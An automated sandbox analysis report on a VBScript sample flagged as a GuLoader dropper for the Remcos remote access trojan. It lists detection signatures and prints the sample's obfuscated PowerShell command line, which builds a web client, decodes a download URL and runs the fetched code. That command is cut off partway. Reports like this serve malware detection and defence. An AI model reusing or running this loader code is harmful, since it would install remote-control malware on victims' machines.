Edit tour
Windows
Analysis Report
Sublabially.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7448 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Subla bially.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7536 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" ";$handsaw s='Underhi ve';;$Hjlp evinduerne s='genernr r';;$Skovs purvenes=' Folkekre'; ;$Fremsend e='Peddigr rets';;$kb elysten=$h ost.Name; function A stroite($M oedt){If ( $kbelysten ) {$Pothee n='Madelin es214';$Sp ildendes=4 ;$Racketli ke=$Spilde ndes}do{$H arpers+=$M oedt[$Rack etlike];$R acketlike+ =5} until( !$Moedt[$R acketlike] )$Harpers} function F orvanskend e($Piphas1 19){ .($cr iminologis t) ($Pipha s119)}$Red efinerende =Astroite 'vascnVer, e roeT Oto .UhyrW';$R edefineren de+=Astroi te 'charEm el,B Si,CA netL skiIb receFeltNK .ont';$Adk omsthavere n=Astroite 'ChepMUnw ooK lizRan giLattlst nl Cena Po m/';$knipp elgodes=As troite ' n kT Es lLei s Vit1Pla t2';$Grill handske='C orv[ StanA nlgE inatH jti.OpkasF orseF rsR, ineVRudlIC o tCBareES lu P SkyoP hotiTendNR ealtBr dM UndAUdvanF o fABombG Br e Gr RF ol ]Mu,f:U pwe: Il,SG oodeUkolc emuF emRSt mIErraTIn teySup.pBe n.RPatiO G entUndrOAn yCKlonODi a lTi.s= u p$s rakM.n dn Acti D. sPKolopRa ie PrsL ow eGFlasOByg gd V.lEInd fS';$Adkom sthaveren+ =Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov r WBoobiKern n MosdB rt oSlotw Boo sHand BypN Re,gTpent Re y1Fork0 Fa n.Ausp0 over; F.n MussW Efti Carn.dea6 Neur4Ophi; Syl Wi.dx Bhin6Pinm4 Cama;Mo,b Drosr F rv Quad:sket1 Tot 3Hous1 Indg. La 0 Urop) Ger GennGonyce T.gtc prok Une o Ind/ skal2Josi0 Pins1 Ord0 Fu o0 Frm1 Ov r0P op1 Aeg. CyklF ,fpaiCombr Teate Undf StyloDef x Spa/ g s1 Orch3 mo,1 Men.dato0 ';$Racketl ikenddater ingsfase=A stroite ' .utUUnmuSC onse F eR Fo - Raca S rGSta.eM or,n verT' ;$Aandsari stokratens =Astroite 'DoblhUnde tSa dtStra pAntesS mm :Skru/opsl / Timi fru gClep2Rent cOr,h.Klap iAtelc Anc u Tra/Klud ZDopitComb y groSBior v.ctuRByst yL ngzSeis / RevBMble lTrvluHemi sGrimt App eoverrRink eRhinrDiff .Dor dSpad eSkarpsodf l Como enz y';$Tryksa ger=Astroi te ' elm>' ;$criminol ogist=Astr oite 'Hull i BonEBat. x';$Lnindk omsts='Non contingenc y';$breadb ox='\misin forms.Non' ;Forvanske nde (Astro ite ' Skr$ Rm bgSv nL paraoTappB Ma uAU mel Bema:Faktc Shrii hosF llesbehaEO punlPuin= Und$Uns.ES andnIntoVD ien:Jac AU n epCullpK ammdAnglAE lektPs uA Sub+Fo n$ EskBSubsrB arneThora PlaDDepeB D mOSni X' );Forvansk ende (Astr oite ' an$ Sprog.krsL Sti OKlieB RefaAB.ggL A.k:Subcg RumRChowA RekMU deM ChicONeooF AfveoParan MokEMicrR S agSPely= Baz $F,beA OutwAJab,N NaphDTrres EagA cykR ObseICop,S HkketEntiO Pennk TypR KlynaEdapt inge.jern dsmSOutw. Va,SsubdP VerdLUnsiI Na sT Fry( Ski$spect S lvR ssiy .rank Bars Teka hang Kemie raR Cal)');For vanskende (Astroite $Grillhand ske);$Aand saristokra tens=$Gram mofoners[0 ];$Couloir 4=(Astroit e ',obb$Su rnGPublL B